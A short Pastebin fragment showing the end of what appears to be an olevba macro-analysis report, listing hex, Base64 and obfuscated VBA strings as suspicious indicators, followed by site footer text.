  613. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  614. |            |                      | be used to obfuscate strings (option    |
  615. |            |                      | --decode to see all)                    |
  616. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  617. |            |                      | may be used to obfuscate strings        |
  618. |            |                      | (option --decode to see all)            |
  619. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  620. |            | Strings              | may be used to obfuscate strings        |
  621. |            |                      | (option --decode to see all)            |
  622. +------------+----------------------+-----------------------------------------+
RAW Paste Data
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top